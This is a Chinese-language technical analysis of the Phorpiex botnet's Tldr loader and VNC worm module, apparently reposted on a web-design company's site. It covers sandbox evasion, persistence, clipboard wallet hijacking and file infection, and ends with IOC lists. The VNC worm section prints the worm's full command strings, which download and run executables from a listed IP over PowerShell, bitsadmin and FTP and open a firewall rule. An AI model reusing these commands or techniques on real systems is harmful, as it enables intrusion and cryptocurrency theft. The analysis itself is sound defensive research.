如何進(jìn)行Phorpiex僵尸網(wǎng)絡(luò)技術(shù)分析

如何進(jìn)行Phorpiex僵尸網(wǎng)絡(luò)技術(shù)分析，針對這個(gè)問題，這篇文章詳細(xì)介紹了相對應(yīng)的分析和解答，希望可以幫助更多想解決這個(gè)問題的小伙伴找到更簡單易行的方法。

目前成都創(chuàng)新互聯(lián)已為上1000+的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)頁空間、網(wǎng)站托管、服務(wù)器托管、企業(yè)網(wǎng)站設(shè)計(jì)、興平網(wǎng)站維護(hù)等服務(wù)，公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶和合作伙伴齊心協(xié)力一起成長，共同發(fā)展。

綜述

Phorpiex僵尸網(wǎng)絡(luò)的核心部分是一個(gè)名為Tldr的加載程序。 它負(fù)責(zé)將其他惡意模塊和其他惡意軟件加載到受感染的計(jì)算機(jī)。 每個(gè)模塊都是單獨(dú)的Windows可執(zhí)行文件。 通常Phorpiex模塊非常小而簡單。 惡意軟件配置（通常包括C＆C服務(wù)器地址，加密貨幣錢包和惡意有效負(fù)載的URL）被硬編碼在惡意軟件可執(zhí)行文件中。 如果需要更新配置，僵尸網(wǎng)絡(luò)只需將新模塊加載到受感染的計(jì)算機(jī)即可。 這些模塊會(huì)經(jīng)常進(jìn)行更新，進(jìn)行細(xì)微的更改。 2019年期間發(fā)現(xiàn)了以下類型的模塊：

Loader Phorpiex Tldr.

VNC Worm Module.

NetBIOS Worm Module.

XMRig Silent Miner.

Spam Module: Self-spreading and Sextortion

Auxiliary modules (小型目標(biāo)定位和痕跡清理模塊).

這些模塊中的3個(gè)（Tldr，VNC蠕蟲和NetBIOS蠕蟲）具有自行傳播功能。 例如，Tldr具有感染病毒功能，能夠感染其他文件。 VNC蠕蟲使用弱密碼連接到VNC服務(wù)器，并嘗試通過模擬用戶輸入來進(jìn)行感染。第一部分中詳細(xì)分析其中兩個(gè)模塊：Loader Phorpiex Tldr，VNC Worm Module.

Phorpiex Tldr

Tldr（“ TrikLoader”）是Phorpiex僵尸網(wǎng)絡(luò)基礎(chǔ)結(jié)構(gòu)的關(guān)鍵部分之一。

首次發(fā)現(xiàn)該惡意軟件時(shí)，無法識(shí)別它或分析與其它僵尸網(wǎng)絡(luò)的聯(lián)系。 但是從它的二進(jìn)制代碼，mutex名稱和逃避沙箱檢測等技術(shù)可以看出，此惡意軟件和Phorpiex Trik IRC bot是由同一批網(wǎng)絡(luò)犯罪分子開發(fā)的，在Trik和Tldr C＆C服務(wù)器之間還發(fā)現(xiàn)了幾個(gè)交叉點(diǎn)。

目前存在大量的Phorpiex Tldr版本，每個(gè)版本具有不同的功能。分析的重點(diǎn)是它們共有的功能，特別是最新版本（自2019年7月起）中添加的新功能。Tldr惡意軟件的主要目的是向受感染的計(jì)算機(jī)下載并執(zhí)行其他模塊和惡意軟件。 Tldr還具有自我傳播的能力，它類似于蠕蟲或文件病毒，可感染其他軟件。

規(guī)避技術(shù)

Phorpiex Tldr使用簡單的沙盒規(guī)避技術(shù)。 啟動(dòng)后，它將調(diào)用GetModuleHandle API函數(shù)以檢查進(jìn)程中是否加載了以下模塊之一：

SBIEDLL.DLL

SBIEDLLX.DLL

WPESPY.DLL

DIR_WATCH.DLL

API_LOG.DLL

DIR_WATCH.DLL

PSTOREC.DLL

然后，它枚舉正在運(yùn)行的進(jìn)程并檢查進(jìn)程文件名是否為以下之一：

VBOXSERVICE.EXE

VBOXTRAY.EXE

VMTOOLSD.EXE

VMWARETRAY.EXE

VMWAREUSER

VMSRVC.EXE

VMUSRVC.EXE

PRL_TOOLS.EXE

XENSERVICE.EXE

較舊版本的Tldr（TldrV3，2018年5月）也會(huì)檢查這些進(jìn)程：然后枚舉正在運(yùn)行的進(jìn)程并檢查進(jìn)程名是否以下之一：

python.exe

pythonw.exe

prl_cc.exe

vboxservice.exe

vboxcontrol.exe

tpautoconnsvc.exe

最后，Tldr調(diào)用IsDebuggerPresent API函數(shù)檢查是否正在調(diào)試惡意軟件。如果一項(xiàng)檢查沒有通過，Tldr會(huì)停止執(zhí)行。

初始化

初始化步驟與Phorpiex Trik的初始化步驟非常相似。為了防止運(yùn)行多個(gè)Phorpiex Tldr，它將創(chuàng)建一個(gè)具有特定硬編碼名稱的互斥。較早版本使用版本號(hào)的互斥鎖名稱，例如“ TldrV3”。 在最新版本中，每個(gè)系列的互斥體名稱不同。 通常由幾位數(shù)字組成，例如：“ 6486894”。

下一步所有Phorpiex樣本都是相同的：刪除“：Zone.Identifier”替代數(shù)據(jù)流。 執(zhí)行此操作是為了消除文件源是不受信任源的問題。自2019年7月起的版本（Tldr v5.0）擁有Debug特權(quán)：

持久化

Tldr將自身復(fù)制到以下文件夾：

%windir%

%userprofile%

%systemdrive% (only version from July 2019)

%temp%

對于Phorpiex Tldr V3，選擇路徑和文件名與Phorpiex Trik相同。 Tldr在這些路徑下創(chuàng)建一個(gè)帶有以“ T-”開頭（在Phorpiex Trik中，名稱以“ M-”開頭）的子文件夾。 然后，惡意軟件將其可執(zhí)行文件復(fù)制到文件夾中。 例如：

C:\WINDOWS\T-9759504507674060850740\winsvc.exe

與Phorpiex Tldr v3不同，較新的版本僅在文件名不包含“ sys”子字符串的情況下才會(huì)進(jìn)行創(chuàng)建復(fù)制。 它使用隨機(jī)數(shù)字生成的子文件夾名稱和以“ sys”開頭加4個(gè)隨機(jī)字母的文件名：

C:\WINDOWS\2813528135\sysjekp.exe

Phorpiex Tldr為創(chuàng)建的文件和子文件夾設(shè)置屬性FILE_ATTRIBUTE_READONLY，F(xiàn)ILE_ATTRIBUTE_HIDDEN，F(xiàn)ILE_ATTRIBUTE_SYSTEM。然后設(shè)置注冊表自動(dòng)運(yùn)行：

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

Tldr使用硬編碼創(chuàng)建新的注冊表值。研究樣本中名稱為“ Windows Operating System”：

它通過注冊表項(xiàng)添加防火墻規(guī)則：

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\

繞過windows安防措施

2019年7月以來的Phorpiex Tldr版本（Tldr v5）通過設(shè)置以下注冊表值來禁用Windows安全功能，例如Windows Defender，安全通知和系統(tǒng)還原：

主要功能

每個(gè)惡意活動(dòng)Phorpiex Tldr都會(huì)創(chuàng)建一個(gè)單獨(dú)的線程。

Crypto Clipper

所有樣本都包含用于竊取加密貨幣的功能，通過更改受感染系統(tǒng)剪貼板中的加密貨幣錢包的地址實(shí)現(xiàn)。惡意軟件每200毫秒調(diào)用API函數(shù)OpenClipboard和GetClipboardData查詢剪貼板數(shù)據(jù)。為了確定剪貼板中是否包含加密錢包地址，Phorpiex Tldr進(jìn)行了以下檢查：

1、首字母是否是：1, 3, q, 2, X, D, 0, L, 4, P, t, z, G, U, E；

2、長度在25到45個(gè)字符或是9個(gè)字母，或90至115個(gè)字母；

3、不包含O (0x4F), I (0x49), l (0x6C)；

4、只含有數(shù)字和字母；

任何一項(xiàng)檢查失敗，剪貼板保持不變。 否則，它將進(jìn)一步確定加密貨幣錢包地址類型，將其更改為硬編碼值之一。 Phorpiex Tldr通過剪貼板數(shù)據(jù)的第一個(gè)字符確定類型：

支持的加密貨幣類型包括：

Bitcoin

Bitcoin Cash

Ethereum

DASH

Dogecoin

Litecoin

Monero

Zcash

Crypto Clipper還處理Perfect Money錢包（金，美元，歐元）：

Self-spreading

該線程中實(shí)現(xiàn)了文件蠕蟲功能。在無限循環(huán)中，Tldr使用GetLogicalDrives枚舉可用的驅(qū)動(dòng)器。讀取“ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”注冊表項(xiàng)值“ NoDrives”，從枚舉中排除NoDrives Windows資源管理器策略禁用的驅(qū)動(dòng)器，選擇可移動(dòng)和遠(yuǎn)程驅(qū)動(dòng)器。在每個(gè)選定的驅(qū)動(dòng)器上，將創(chuàng)建一個(gè)名為“ __”的文件夾，并將屬性設(shè)置為FILE_ATTRIBUTE_READONLY，F(xiàn)ILE_ATTRIBUTE_HIDDEN和FILE_ATRRIBUTE_SYSTEM，使其在資源管理器中不可見。

惡意軟件會(huì)使用硬編碼名稱（示例中為“ DriveMgr.exe”）將自身復(fù)制到此文件夾中。 Tldr獲取所選驅(qū)動(dòng)器的卷名稱。然后在所選驅(qū)動(dòng)器的根文件夾中創(chuàng)建一個(gè)名為“ {volume_name} .lnk”的快捷方式：

%windir%\system32\cmd.exe /c start __ & __\DriveMgr.exe & exit

然后Tldr將所有文件夾從所選驅(qū)動(dòng)器的根路徑移至文件夾“ __”。它還會(huì)刪除根路徑中具有以下擴(kuò)展名的所有文件：

*.lnk, *.vbs, *.bat, *.js, *.scr, *.com, *.jse, *.cmd,*.pif, *.jar, *.dll, *.vbe, *.inf”

這樣做的原因可能是禁用在同一驅(qū)動(dòng)器上的所有其他蠕蟲。在Tldr v5.0中引入了一項(xiàng)新功能，允許惡意軟件充感染其他可執(zhí)行文件。此前，Phorpiex使用單獨(dú)的模塊來感染其他軟件。惡意軟件會(huì)掃描可移動(dòng)和遠(yuǎn)程驅(qū)動(dòng)器上的所有文件夾，并感染所有尚未感染的.exe文件。

為了感染PE文件，Tldr執(zhí)行以下修改：增加PE文件頭中節(jié)的數(shù)量，并將頭的TimeDateStamp值設(shè)置為0x0000DEAD：

惡意軟件還使用TimeDateStamp中的值來檢測文件是否已被感染。 值0x0000DEAD轉(zhuǎn)換為時(shí)間戳1970-01-01 15:50:05。使用以下查詢可以在VirusTotal上輕松找到被感染的樣本：

pets:1970-01-01T15:50:05

Tldr還會(huì)創(chuàng)建一個(gè)名為“ .zero”的新代碼段，將惡意負(fù)載復(fù)制到該段。 修改入口點(diǎn)地址指向所創(chuàng)建節(jié)的開頭。該惡意軟件不會(huì)重新計(jì)算校驗(yàn)和，只是重置為0。

惡意軟件在主代碼中寫入其相對地址：

使用值0xCCCCCCCC在模板函數(shù)中找到原始入口點(diǎn)：

Shellcode

插入受感染文件中的shellcode由幾個(gè)功能組成。 不使用絕對地址，放置在任何內(nèi)存位置時(shí)都能夠正確運(yùn)行。

首先，shellcode檢查文件“％appdata％\ winsvcs.txt”是否存在。如果該文件存在，shellcode不會(huì)執(zhí)行任何操作，只將控制權(quán)傳遞給感染程序的原始入口點(diǎn)；文件存在，則將從硬編碼的URL下載并執(zhí)行另一個(gè)文件：

使用URLDownloadToFileW將文件下載到臨時(shí)文件。 使用函數(shù)GetTempPathW和GetTempFileNameW獲得臨時(shí)文件的名稱。 如果文件下載成功，shellcode將從該文件中刪除“：Zone.Identifier” ADS，并使用CreateProcessW執(zhí)行該文件。

C&C檢查

首次運(yùn)行時(shí)，Phorpiex Tldr使用C＆C服務(wù)器的硬編碼列表對其C＆C服務(wù)器發(fā)出HTTP請求：

Tldr為每個(gè)C＆C服務(wù)器創(chuàng)建一個(gè)線程。 在啟動(dòng)線程之前，惡意軟件會(huì)創(chuàng)建一個(gè)空文件“％appdata％\ winsvcs.txt”。 該文件用作確定惡意軟件是否首次運(yùn)行的標(biāo)志。 如果該文件已經(jīng)存在，則不會(huì)創(chuàng)建線程。

在每個(gè)線程中，惡意軟件都會(huì)查詢以下URL：

http://<cnc_host>/t.php?new=1

在其他樣本中還看到了不同格式的URL，例如：

http://<cnc_host>/tldr.php?new=1

http://<cnc_host>/tldr.php?on=1

http://<cnc_host>/tldr.php?new=1&id=<random_number>

http://<cnc_host>/tldr.php?new=1&on=<random_number>

為了執(zhí)行請求，Phorpiex Tldr對用戶請求頭使用特定的硬編碼值。2019年7月開始的值是：

Mozilla / 5.0（Windows NT 10.0; Win64; x64; rv：67.0）Gecko / 20100101 Firefox / 67.0

較舊版本的值：

Mozilla / 5.0（Macintosh; Intel Mac OS X 10.9; rv：25.0）Gecko / 20100101 Firefox / 25.0

生成的HTTP請求如下所示：

主線程

Phorpiex Tldr主要目的是在受感染的主機(jī)上下載并執(zhí)行其他惡意負(fù)載。它使用硬編碼的路徑（通常4到8個(gè)）來創(chuàng)建用于下載文件的URL：

http://<cnc_domain>/1.exe

http://<cnc_ domain>/2.exe

每個(gè)生成的URL，惡意軟件首先使用InternetOpenUrlA和HttpQueryInfoA檢查其可用性和大小。 如果URL可用，則Tldr會(huì)記住每個(gè)路徑的大小。 如果大小與先前的值相同，則將跳過URL，防止重新下載。如果URL可用或者內(nèi)容長度與先前的值不同，Tldr將下載并執(zhí)行它。下載的文件保存在％temp％文件夾下，名稱為：

“%d.exe” % random.randint(10000, 40000)

Tldr會(huì)有兩次下載文件的嘗試：使用InternetOpenUrlW / InternetReadFile；如果第一次失敗，則使用URLDownloadToFileW。下載文件后，Porpiex Tldr刪除“：Zone.Identifier”。然后使用CreateProcess兩次執(zhí)行下載的文件，如果第一次失敗，則使用ShellExecute。

最新的Tldr版本（v5）有了重大改進(jìn)，使用帶有R**和RSA-SHA1簽名驗(yàn)證的文件。加密文件頭包含魔術(shù)字節(jié)（“ NGS！”），RSA簽名的長度以及用于驗(yàn)證文件的RSA簽名。 RSA簽名的前16個(gè)字節(jié)用作R**解密密鑰：

Phorpiex Tldr使用文件中的16字節(jié)R**密鑰解密數(shù)據(jù)，然后計(jì)算解密文件的SHA1哈希。 為了驗(yàn)證數(shù)字簽名，Tldr使用硬編碼到樣本中的4096位RSA公鑰。

VNC Worm 模塊

在Phorpiex中發(fā)現(xiàn)的模塊之一是惡意VNC客戶端。它沒有自己的持久性機(jī)制，每次都會(huì)由Tldr執(zhí)行。惡意軟件會(huì)掃描隨機(jī)IP地址查找開放的VNC服務(wù)器端口（5900），使用硬編碼的列表進(jìn)行暴力攻擊。 最終目標(biāo)是在目標(biāo)主機(jī)上加載并執(zhí)行另一個(gè)惡意軟件（通常是Phorpiex Tldr）。

Phorpiex VNC蠕蟲執(zhí)行一開始就利用API bombing技術(shù)規(guī)避沙盒。 它在循環(huán)中執(zhí)行多個(gè)函數(shù)的大量無意義的調(diào)用：

使用硬編碼名稱的互斥鎖來防止多次執(zhí)行：

攻擊本身是無限循環(huán)的。使用rand函數(shù)隨機(jī)生成用于掃描的IP地址，將GetTickCount作為隨機(jī)種子。 IP地址的唯一過濾規(guī)則是它不能以127、172或192開頭。如果成功連接到TCP端口5900，VNC蠕蟲會(huì)使用密碼列表對發(fā)現(xiàn)的VNC服務(wù)器發(fā)起暴力攻擊：

密碼列表在不同樣本中可能有所不同。如果攻擊成功，使用以下格式的URL將結(jié)果報(bào)告給C＆C服務(wù)器：

hxxp://92.63.197.153/result.php?vnc=%s|%s” % (host, password)

最后，Phorpiex VNC通過使用VNC協(xié)議模擬鍵盤輸入，在受害者的計(jì)算機(jī)上執(zhí)行多個(gè)腳本。

執(zhí)行以下操作：

cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(‘http://92.63.197.153/vnc.exe’,’%temp%\48303045850.exe’);Start-Process ‘%temp%\48303045850.exe’cmd.exe /c bitsadmin /transfer getitman /download /priority highhttp://92.63.197.153/vnc.exe%temp%\49405003030.exe&start %temp%\49405003030.execmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe “ok” ENABLE&netsh advfirewall firewall add rule name=”ok” dir=in action=allow program=”C:\Windows\System32\ftp.exe” enable=yescmd.exe /c “cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get vnc.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start vnc.exe”

Phorpiex VNC蠕蟲會(huì)使受害者的計(jì)算機(jī)通過HTTP或FTP從服務(wù)器上下載并執(zhí)行惡意腳本：

ftp://tom:hehehe@92.63.197[.]153/vnc.exe

ftp://tom:hehehe@92.63.197[.]153/ohuh.exe

http://92.63.197[.]153/vnc.exe

http://92.63.197[.]153/ohuh.exe

IOC

Phorpiex Tldr

Phorpiex Tldr C&C IP和域

185.176.27.132

193.32.161.69

193.32.161.73

193.32.161.77

92.63.197.153

92.63.197.38

92.63.197.59

92.63.197.60

94.156.133.65

aiiaiafrzrueuedur.ru

fafhoafouehfuh.su

ffoeefsheuesihfo.ru

osheoufhusheoghuesd.ru

ouhfuosuoosrhzfzr.ru

slpsrgpsrhojifdij.ru

unokaoeojoejfghr.ru

b0t.to

thaus.to

thaus.top

Phorpiex Tldr相關(guān)url

hxxp://185.176.27[.]132/a.exe

hxxp://aiiaiafrzrueuedur.ru/o.exe

hxxp://185.176.27[.]132/1

hxxp://185.176.27[.]132/2

hxxp://185.176.27[.]132/3

hxxp://185.176.27[.]132/4

hxxp://185.176.27[.]132/5

hxxp://185.176.27[.]132/6

hxxp://185.176.27[.]132/7

hxxp://193.32.161[.]69/1.exe

hxxp://193.32.161[.]69/2.exe

hxxp://193.32.161[.]69/3.exe

hxxp://193.32.161[.]69/4.exe

hxxp://193.32.161[.]69/5.exe

hxxp://193.32.161[.]69/6.exe

hxxp://193.32.161[.]69/7.exe

hxxp://193.32.161[.]69/ya.exe

hxxp://193.32.161[.]73/1

hxxp://193.32.161[.]73/2

hxxp://193.32.161[.]73/3

hxxp://193.32.161[.]73/4

hxxp://193.32.161[.]73/5

hxxp://193.32.161[.]73/6

hxxp://193.32.161[.]73/s.exe

hxxp://193.32.161[.]77/11.exe

Phorpiex VNC Worm

關(guān)于如何進(jìn)行Phorpiex僵尸網(wǎng)絡(luò)技術(shù)分析問題的解答就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，如果你還有很多疑惑沒有解開，可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關(guān)知識(shí)。

名稱欄目：如何進(jìn)行Phorpiex僵尸網(wǎng)絡(luò)技術(shù)分析
標(biāo)題鏈接：http://bm7419.com/article36/igohsg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供ChatGPT、微信公眾號(hào)、、響應(yīng)式網(wǎng)站、云服務(wù)器、品牌網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)